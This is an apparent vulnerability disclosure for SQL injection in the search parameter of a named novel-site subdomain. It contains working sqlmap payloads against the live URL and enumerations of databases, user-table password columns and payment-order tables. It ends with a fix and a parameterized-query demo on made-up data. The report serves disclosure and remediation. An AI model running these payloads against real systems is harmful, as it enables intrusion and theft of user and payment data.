A website under the 17k novel network has a SQL injection that could lead to leakage of order information
http://ssqj.qiye.ikanshu.cn/
Search Area
Packet Capture
Injection Point
http://ssqj.qiye.ikanshu.cn/org!bookList.xhtml?qiyeId=4&searchKey=a*
sqlmap identified the following injection points with a total of 70 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://ssqj.qiye.ikanshu.cn:80/org!bookList.xhtml?qiyeId=4&searchKey=a%' AND 8528=8528 AND '%'='

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://ssqj.qiye.ikanshu.cn:80/org!bookList.xhtml?qiyeId=4&searchKey=a%' AND SLEEP(5) AND '%'='
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
Databases
web application technology: JSP
back-end DBMS: MySQL 5.0.11
available databases [19]:
[*] ads
[*] banquan
[*] ca_web_pay
[*] cdps
[*] client_user_center
[*] desay
[*] information_schema
[*] qiye
[*] resource_auth
[*] resource_process
[*] skymobi_1
[*] skymobi_2
[*] skymobi_3
[*] skymobi_4
[*] skymobi_5
[*] test
[*] wap_17k
[*] xinhua
[*] zentaotask
Current Database
Current database: 'qiye'
Data Volume (row counts per table)
Database: qiye
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| bookchaptercontent | 645223  |
| bookchapter        | 645214  |
| pv_log             | 126977  |
| qiye_book          | 55327   |
| bookview           | 55034   |
| bookvolume         | 46820   |
| qiye_book_bk       | 19146   |
| book               | 7470    |
| area               | 3511    |
| tmp_id             | 3017    |
| special_book       | 2430    |
| qikan_data         | 2119    |
| `user`             | 1836    |
| doc                | 676     |
| read_history       | 527     |
| data_category      | 387     |
| special_book_1211  | 360     |
| special_book_bk    | 250     |
| news               | 170     |
| fav_history        | 137     |
| qikan              | 79      |
| zan_history        | 77      |
| activity           | 61      |
| comment            | 53      |
| user_amountlog     | 41      |
| fav_doc_history    | 40      |
| data_authorized    | 33      |
| user_feedback      | 32      |
| feeduser           | 29      |
| bookcategory       | 28      |
| comment_hd         | 24      |
| qiye               | 23      |
| special            | 11      |
| activity_winner    | 5       |
| user_amount        | 4       |
| book_off           | 1       |
+--------------------+---------+
User Table Fields
Database: qiye
Table: user
[13 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| create_date     | datetime     |
| email           | varchar(255) |
| id              | int(11)      |
| info            | varchar(255) |
| last_login_time | datetime     |
| logo            | varchar(200) |
| name            | varchar(200) |
| nick_name       | varchar(100) |
| password        | varchar(50)  |
| qiye_id         | int(11)      |
| status          | smallint(3)  |
| tel             | varchar(50)  |
| update_date     | datetime     |
+-----------------+--------------+
Cross-Database Access
wap_17k
Database: wap_17k
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| bookcomment        | 79887   |
| paylog             | 56624   |
| yeepayorder        | 20874   |
| yeepayresponse     | 20212   |
| useramountlog      | 4332    |
| userbookmark       | 3980    |
| `user`             | 3425    |
| useramount         | 3196    |
| userbookchapterlog | 1291    |
| feedback           | 620     |
| room_msg           | 126     |
| cmsbook            | 53      |
| cmscategory        | 11      |
| adminuser          | 6       |
+--------------------+---------+
The yeepayorder table is suspected to hold order information.
Database: wap_17k
Table: user
[16 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| domain        | varchar(50)  |
| age           | int(5)       |
| birthDate     | date         |
| email         | varchar(255) |
| hobby         | varchar(255) |
| id            | int(11)      |
| lastLoginDate | datetime     |
| loginTimes    | int(11)      |
| logoImg       | varchar(255) |
| mobile        | varchar(20)  |
| nickName      | varchar(255) |
| password      | varchar(16)  |
| qq            | varchar(30)  |
| regTime       | datetime     |
| sex           | tinyint(2)   |
| share         | tinyint(1)   |
+---------------+--------------+
Solution:
Filter the user-supplied searchKey parameter before it is used in the SQL query.
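The boolean-based payload above only works because searchKey is concatenated into a LIKE pattern. The following is an added example, not code from the report or from the ikanshu.cn application: it rebuilds that concatenation against a constructed in-memory SQLite table (standing in for the MySQL qiye_book table, with made-up rows) and contrasts it with a bound-parameter query that also escapes LIKE wildcards, so the same payload is treated as a literal search string.

```python
import sqlite3

# Constructed sample rows (not data from the report); schema shape is assumed.
SAMPLE_BOOKS = [("Alpha Tales", 4), ("Beta Story", 4), ("Gamma", 4), ("Alpha Two", 5)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE qiye_book (name TEXT, qiye_id INTEGER)")
    conn.executemany("INSERT INTO qiye_book VALUES (?, ?)", SAMPLE_BOOKS)
    return conn


def search_vulnerable(conn, qiye_id, search_key):
    # String concatenation: the quote in the input closes the LIKE literal and
    # the rest of the input becomes SQL, which is what the report's payload relies on.
    sql = ("SELECT name FROM qiye_book WHERE qiye_id = %d "
           "AND name LIKE '%%%s%%' ORDER BY name" % (qiye_id, search_key))
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, qiye_id, search_key):
    # Bound parameters keep the input out of the SQL text; escaping '%', '_' and
    # the escape character itself keeps user-typed wildcards literal as well.
    escaped = (search_key.replace("\\", "\\\\")
                         .replace("%", "\\%")
                         .replace("_", "\\_"))
    sql = ("SELECT name FROM qiye_book WHERE qiye_id = ? "
           "AND name LIKE ? ESCAPE '\\' ORDER BY name")
    return [row[0] for row in conn.execute(sql, (qiye_id, "%" + escaped + "%"))]


def demo():
    conn = make_db()
    # The two boolean-blind probes from the sqlmap output (true and false condition).
    true_probe = "a%' AND 8528=8528 AND '%'='"
    false_probe = "a%' AND 8528=8529 AND '%'='"
    return {
        "vuln_true": search_vulnerable(conn, 4, true_probe),    # every row with an 'a'
        "vuln_false": search_vulnerable(conn, 4, false_probe),  # no rows: the oracle
        "fixed_true": search_fixed(conn, 4, true_probe),        # literal match, no rows
        "normal": search_fixed(conn, 4, "alpha"),               # ordinary search still works
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The differing result sets for the true and false probes in the vulnerable path are exactly the signal a boolean-based blind tool keys on; in the fixed path both probes return nothing because they are searched for as literal text.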